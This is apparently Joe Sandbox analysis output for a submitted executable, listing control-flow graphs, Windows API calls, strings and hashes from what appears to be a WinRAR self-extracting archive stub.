                                                                                                                                                                            control_flow_graph 1018 24f826-24f841 call 2657d8 1021 24f925-24f935 FindNextFileW 1018->1021 1022 24f847-24f84d 1018->1022 1023 24f937-24f946 GetLastError 1021->1023 1024 24f948-24f9fa call 2425c3 call 2414a7 call 25229d call 241a66 call 257c44 * 3 1021->1024 1025 24f851-24f864 FindFirstFileW 1022->1025 1026 24f84f 1022->1026 1027 24f91d-24f920 1023->1027 1031 24f9ff-24fa0a call 265787 1024->1031 1025->1024 1029 24f86a-24f88e call 25169a 1025->1029 1026->1025 1027->1031 1036 24f890-24f897 1029->1036 1037 24f8ac-24f8b6 1029->1037 1040 24f89c-24f8aa FindFirstFileW 1036->1040 1041 24f899 1036->1041 1042 24f8fd-24f900 1037->1042 1043 24f8b8-24f8d3 1037->1043 1040->1037 1041->1040 1042->1024 1048 24f902-24f90b GetLastError 1042->1048 1045 24f8f4-24f8fc call 265726 1043->1045 1046 24f8d5-24f8ee call 2419a9 1043->1046 1045->1042 1046->1045 1052 24f90d-24f910 1048->1052 1053 24f91b 1048->1053 1052->1053 1054 24f912-24f915 1052->1054 1053->1027 1054->1053 1058 24f917-24f919 1054->1058 1058->1027
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024F830
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?,00000274,0024F733,000000FF,00000049,00000049,?,?,0024A684,?,?,00000000,?,?,?), ref: 0024F859
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049), ref: 0024F8A4
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049,?,00000000), ref: 0024F902
                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,00000274,0024F733,000000FF,00000049,00000049,?,?,0024A684,?,?,00000000,?,?,?), ref: 0024F92D
                                                                                                                                                                            • GetLastError.KERNEL32(?,0024D303,?,?,?,?,?,?,?,6294DA82,00000049,?,00000000), ref: 0024F93A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3831798110-0
                                                                                                                                                                            • Opcode ID: 95704f623133f45202b1b9c7ff1004c1d9b68f5c386cdc91263fc9b4dbf0af4b
                                                                                                                                                                            • Instruction ID: 3bd9f45e65a0b530012d6cb8207b7591cf371bd4ff5f363dd6bbddd2ece16c08
                                                                                                                                                                            • Opcode Fuzzy Hash: 95704f623133f45202b1b9c7ff1004c1d9b68f5c386cdc91263fc9b4dbf0af4b
                                                                                                                                                                            • Instruction Fuzzy Hash: B8515571914619DFCF58DF64D988ADDB7B9BF49320F1402AAE419E3290D730AEA4CF50
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0024C342
                                                                                                                                                                              • Part of subcall function 00252095: __EH_prolog3_GS.LIBCMT ref: 0025209C
                                                                                                                                                                              • Part of subcall function 002457C0: __EH_prolog3.LIBCMT ref: 002457C7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3H_prolog3__wcslen
                                                                                                                                                                            • String ID: __tmp_reference_source_
                                                                                                                                                                            • API String ID: 1523997010-685763994
                                                                                                                                                                            • Opcode ID: ae1d18fd723c5b6629fe6a63e14842e9245f08b8140c842218a9177689db30af
                                                                                                                                                                            • Instruction ID: 42e852cbf801b0bb2e402c1f369ab56341e53007ef1984de43bdc729b5cdc100
                                                                                                                                                                            • Opcode Fuzzy Hash: ae1d18fd723c5b6629fe6a63e14842e9245f08b8140c842218a9177689db30af
                                                                                                                                                                            • Instruction Fuzzy Hash: B1D2F47092528A9FDF6DDF78C890BEEBBB4BF05304F14015EE88A97241D774A968CB50
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,?,0026EC80,00000000,00286F40,0000000C,0026EDD7,00000000,00000002,00000000), ref: 0026ECCB
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0026EC80,00000000,00286F40,0000000C,0026EDD7,00000000,00000002,00000000), ref: 0026ECD2
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0026ECE4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                            • Opcode ID: a8bd8443b8c313b5301c9c0d7fc15e47da0a66b7c80675881fd7daba34974b9a
                                                                                                                                                                            • Instruction ID: 98a128d908f459174a1eb1566f0332bd966e42b8e4ef01e818961da48fe1f693
                                                                                                                                                                            • Opcode Fuzzy Hash: a8bd8443b8c313b5301c9c0d7fc15e47da0a66b7c80675881fd7daba34974b9a
                                                                                                                                                                            • Instruction Fuzzy Hash: 8CE04636010208AFCF116F64EE0CA5C3B29EF00381B211428F9089A122CB36ECA2CB80
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                                                            • Opcode ID: 8eb0299f73c360de9ee9c122ee12d2c0de4cef626a862fe364ae316bde5baed7
• Instruction ID: 958f911b0faafbc7b22f49ad2270296aacbfb1144666f57e3c67e32ac010a7c2
• Opcode Fuzzy Hash: 8eb0299f73c360de9ee9c122ee12d2c0de4cef626a862fe364ae316bde5baed7
• Instruction Fuzzy Hash: 92E1D4715183458FDB25CF28C889B5BBBE1BF88309F04456DEC889B342D774E958CB9A
APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 0026090A
  • Part of subcall function 00241E44: GetDlgItem.USER32(00000000,00003021), ref: 00241E88
  • Part of subcall function 00241E44: SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
• EndDialog.USER32(?,00000000), ref: 00260A18
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00260A57
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00260A71
• IsDialogMessageW.USER32(?,?), ref: 00260A84
• TranslateMessage.USER32(?), ref: 00260A92
• DispatchMessageW.USER32(?), ref: 00260A9C
• EndDialog.USER32(?,00000001), ref: 00260ADE
• GetDlgItem.USER32(?,00000068), ref: 00260B04
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00260B1F
• SendMessageW.USER32(00000000,000000C2,00000000,0027C6C8), ref: 00260B32
• SetFocus.USER32(00000000), ref: 00260B39
• GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00260C20
• GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00260C4C
• GetTickCount.KERNEL32 ref: 00260C79
• GetLastError.KERNEL32(?,00000011), ref: 00260CD5
• GetCommandLineW.KERNEL32 ref: 00260DF9
• _wcslen.LIBCMT ref: 00260E06
• CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,00295430,00000400,00000001,00000001), ref: 00260E85
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00260EA3
• ShellExecuteExW.SHELL32(0000003C), ref: 00260EDC
• WaitForInputIdle.USER32(?,00002710), ref: 00260F0B
• Sleep.KERNEL32(00000064), ref: 00260F25
• UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,00295430,00000400), ref: 00260F61
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00295430,00000400), ref: 00260F6D
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00261072
  • Part of subcall function 00241E1F: GetDlgItem.USER32(?,?), ref: 00241E34
  • Part of subcall function 00241E1F: ShowWindow.USER32(00000000), ref: 00241E3B
• SetDlgItemTextW.USER32(?,00000065,0027C6C8), ref: 0026108A
• GetDlgItem.USER32(?,00000065), ref: 00261093
• GetWindowLongW.USER32(00000000,000000F0), ref: 002610A2
• DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00261422
• EndDialog.USER32(?,00000001), ref: 00261436
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002610B1
  • Part of subcall function 0025E265: __EH_prolog3_GS.LIBCMT ref: 0025E26C
  • Part of subcall function 0025E265: ShowWindow.USER32(?,00000000,00000038), ref: 0025E294
  • Part of subcall function 0025E265: GetWindowRect.USER32(?,?), ref: 0025E2D8
  • Part of subcall function 0025E265: ShowWindow.USER32(?,00000005,?,00000000), ref: 0025E373
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0026114F
• SendMessageW.USER32(?,00000080,00000001,000103D3), ref: 00261284
• SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,13050D28), ref: 0026129D
• GetDlgItem.USER32(?,00000068), ref: 002612A6
• SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 002612BE
• GetDlgItem.USER32(?,00000066), ref: 002612E6
• SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0026135D
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00261371
• EnableWindow.USER32(?,00000000), ref: 002615A7
• SendMessageW.USER32(?,00000111,00000001,00000000), ref: 002615E8
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0026160D
  • Part of subcall function 00261D4F: __EH_prolog3_GS.LIBCMT ref: 00261D59
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
• String ID: -el -s2 "-d%s" "-sp%s"$<$@$@S)$@U=u$LICENSEDLG$STARTDLG$\S)$__tmp_rar_sfx_access_check_$`!>uJ&$winrarsfxmappingfile.tmp
• API String ID: 3616063595-4251723326
• Opcode ID: e54697d2651bac5b9290c427b4bab2e7666800a9c5f0fc1ccb6c51518a1589b4
• Instruction ID: 882e8a928b9bd25755f3ead8aabcd26bb13e5cae07c0c78fa96fe34f7eda34ba
• Opcode Fuzzy Hash: e54697d2651bac5b9290c427b4bab2e7666800a9c5f0fc1ccb6c51518a1589b4
• Instruction Fuzzy Hash: 0C72D470920358AEEF25EBA0DC89FEE7BB9AB01704F044099F505B7192D7B05AE4CF21

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 474 256d7b-256dd1 call 265b20 GetModuleHandleW 477 256dd3-256de3 GetProcAddress 474->477 478 256e28-25708c 474->478 481 256de5-256dfb 477->481 482 256dfd-256e0d GetProcAddress 477->482 479 257092-25709d call 26e50e 478->479 480 25719b 478->480 479->480 491 2570a3-2570b8 call 2513f9 479->491 484 25719d-2571be call 2513f9 call 252117 480->484 481->482 482->478 483 256e0f-256e24 482->483 483->478 497 2571c0-2571cc call 25067e 484->497 498 2570bd-2570d5 CreateFileW 491->498 499 2570ba 491->499 508 257203-257234 call 2414a7 call 25229d call 241a66 call 24ed1f 497->508 509 2571ce-2571dc call 256c5e 497->509 501 257186-257199 CloseHandle call 241a66 498->501 502 2570db-2570e7 SetFilePointer 498->502 499->498 501->484 502->501 503 2570ed-257107 ReadFile 502->503 503->501 506 257109-257114 503->506 511 2573f2-2573f7 call 265ce1 506->511 512 25711a-25714d call 2414a7 506->512 538 257239-25723c 508->538 509->508 521 2571de-257201 CompareStringW 509->521 524 257161-257174 call 256366 512->524 521->508 522 25723e-257242 521->522 522->497 526 257248 522->526 532 257176-257181 call 241a66 * 2 524->532 533 25714f-257156 524->533 529 25724c-257250 526->529 534 257296-257298 529->534 535 257252 529->535 532->501 536 257158 533->536 537 25715b-25715c call 256c5e 533->537 539 2573bd-2573ef call 241a66 * 2 call 265734 534->539 540 25729e-2572b1 call 252187 call 25067e 534->540 542 257254-25728a call 2414a7 call 25229d call 241a66 call 24ed1f 535->542 536->537 537->524 538->522 544 25724a 538->544 559 2572b3-257330 call 256c5e * 2 call 254318 call 256a25 call 254318 call 2414a7 call 25ecf5 call 241549 540->559 560 257332-257366 call 256a25 AllocConsole 540->560 576 257294 542->576 577 25728c-257290 542->577 544->529 578 2573b0-2573b7 call 241549 ExitProcess 559->578 571 2573ad 560->571 572 257368-2573a7 GetCurrentProcessId AttachConsole call 257441 call 257436 GetStdHandle WriteConsoleW Sleep FreeConsole 560->572 571->578 572->571 576->534 577->542 581 257292 577->581 581->534
APIs
• GetModuleHandleW.KERNEL32(kernel32,6294DA82), ref: 00256DC7
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00256DD9
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00256E03
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002570CA
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 002570DF
• ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 002570FF
• CloseHandle.KERNEL32(00000000), ref: 00257187
• CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 002571F8
• AllocConsole.KERNEL32 ref: 0025735E
• GetCurrentProcessId.KERNEL32 ref: 00257368
• AttachConsole.KERNEL32(00000000), ref: 0025736F
• GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 0025738F
• WriteConsoleW.KERNEL32(00000000), ref: 00257396
• Sleep.KERNEL32(00002710), ref: 002573A1
• FreeConsole.KERNEL32 ref: 002573A7
• ExitProcess.KERNEL32 ref: 002573B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
• API String ID: 2644799563-3298887752
• Opcode ID: dc8f08188d1fa23e2b2bc4c9d216dc75ee18e878309e78e45408c839a72d8784
• Instruction ID: 6b607d4288c963d91daba6da03fc8931b8fd95a8f168c73fb34528e37b5f50f6
• Opcode Fuzzy Hash: dc8f08188d1fa23e2b2bc4c9d216dc75ee18e878309e78e45408c839a72d8784
• Instruction Fuzzy Hash: E4F19CB14202899BCB24EFA4DC49BDE3BB9BF05305F508119FD0DAB281DB709669CF95

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 597 263572-2635aa call 260678 GetDlgItem 600 2635e4-263622 597->600 601 2635ac-2635c8 call 25d455 ShowWindow 597->601 607 263624-26363f 600->607 608 263643-263659 600->608 606 2635cf-2635dd 601->606 606->600 607->608 611 26365d-26367d 608->611 612 26365b 608->612 615 2636a2-2636c3 call 265734 611->615 616 26367f-26369b 611->616 612->611 616->615
APIs
  • Part of subcall function 00260678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00260689
  • Part of subcall function 00260678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0026069A
  • Part of subcall function 00260678: IsDialogMessageW.USER32(000103E6,?), ref: 002606AE
  • Part of subcall function 00260678: TranslateMessage.USER32(?), ref: 002606BC
  • Part of subcall function 00260678: DispatchMessageW.USER32(?), ref: 002606C6
• GetDlgItem.USER32(00000068,00000000), ref: 00263595
• ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,0025FD20,00000001,?,?), ref: 002635BA
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002635C9
• SendMessageW.USER32(00000000,000000C2,00000000,0027C6C8), ref: 002635D7
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002635F1
• SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0026360B
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0026364F
• SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00263662
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00263675
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0026369C
• SendMessageW.USER32(00000000,000000C2,00000000,0027C860), ref: 002636AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                            • String ID: @U=u$\
                                                                                                                                                                            • API String ID: 3569833718-2368183754
                                                                                                                                                                            • Opcode ID: 2363b1168457406e14e09d7461b4de6c319cba6c70934fb2e9fc7fa0484b3388
                                                                                                                                                                            • Instruction ID: 2c52549fe9a8f546450f6353099786c21d340ef17e967cc1b0c130dd601b4a50
                                                                                                                                                                            • Opcode Fuzzy Hash: 2363b1168457406e14e09d7461b4de6c319cba6c70934fb2e9fc7fa0484b3388
                                                                                                                                                                            • Instruction Fuzzy Hash: E231D071259700BFE311DF20EC4DFAB7BECEF46711F00051AF955962A1DB7099448BAA

Control-flow Graph
APIs
• __EH_prolog3_GS.LIBCMT ref: 002638A7
• ShellExecuteExW.SHELL32(?), ref: 00263AA4
• IsWindowVisible.USER32(?), ref: 00263ACF
• ShowWindow.USER32(?,00000000), ref: 00263ADD
• WaitForInputIdle.USER32(?,000007D0), ref: 00263AED
• GetExitCodeProcess.KERNEL32(?,?), ref: 00263B0F
• CloseHandle.KERNEL32(?), ref: 00263B33
• ShowWindow.USER32(?,00000001), ref: 00263B76
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
• String ID: .exe$.inf$\'
• API String ID: 3208621885-2242554641
• Opcode ID: 3fca241c64398a0af1c19e1455fcff9fae7d11e1ff517aad31293706d1aa1e3b
• Instruction ID: 19801bb06f3578a9fd96f1dc64b4fc26e160b71d0b36ed0b12e04549c0d6b33e
• Opcode Fuzzy Hash: 3fca241c64398a0af1c19e1455fcff9fae7d11e1ff517aad31293706d1aa1e3b
• Instruction Fuzzy Hash: 97B1BB30A21259DFCB25DF64D8897EDB7B5FF44314F28811AE848A7290D7B0AEE5CB50

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: _wcslen
• String ID: HIDE$MAX$MIN
• API String ID: 176396367-2426493550
• Opcode ID: 132def0dccd4a3ae5a342446e33dd6c0fbc557e55eda2daa7f854c1570c1401f
• Instruction ID: fe2d4177a359ff3b6ac093b7e818c08827331021b8616c6189b75562fd48bc7d
• Opcode Fuzzy Hash: 132def0dccd4a3ae5a342446e33dd6c0fbc557e55eda2daa7f854c1570c1401f
• Instruction Fuzzy Hash: 64B1BE72C20669DACF25DFA4CC85ADDBBB8AF49300F14019AE445B7181DB709EE9CF61

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: H_prolog3
• String ID: Lc($Lc($Lc($Lc(
• API String ID: 431132790-695443888
• Opcode ID: 1cb9d1e95600f95193aecfad4b3f72563454b1c7d1356f3fae614e097a772f7d
• Instruction ID: 57746710ee2dc77a3c7b0ed103f8562f960acfdd9c377c8d60c5742553bced28
• Opcode Fuzzy Hash: 1cb9d1e95600f95193aecfad4b3f72563454b1c7d1356f3fae614e097a772f7d
• Instruction Fuzzy Hash: 568146B1934315CFDB24EF64C889B6AB7E8AF45311F00092EEC5597181E7B099FC8B99

Control-flow Graph
APIs
• __EH_prolog3_GS.LIBCMT ref: 00263F03
• SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00263F1B
• SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00263F86
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: EnvironmentVariable$H_prolog3_
• String ID: sfxcmd$sfxpar
• API String ID: 3605364767-3493335439

APIs
• GetClassNameW.USER32(?,?,00000050), ref: 0025F2EF
• SHAutoComplete.SHLWAPI(?,00000010), ref: 0025F326
  • Part of subcall function 00258DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00250E3F,?,?,?,00000046,00251ECE,00000046,?,exe,00000046), ref: 00258DBA
• FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0025F316
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
Similarity
• API ID: AutoClassCompareCompleteFindNameStringWindow
• String ID: @Uxu$EDIT
• API String ID: 4243998846-59804995

APIs
• CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,6294DA82,?,?,00000000,?,?,00000000,00279E6B,000000FF), ref: 0024E248
• GetLastError.KERNEL32(?,?,00000000,00279E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0024E25A
• CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,00279E6B,000000FF,?,00000011), ref: 0024E2A6
• GetLastError.KERNEL32(?,?,00000000,00279E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0024E2AF
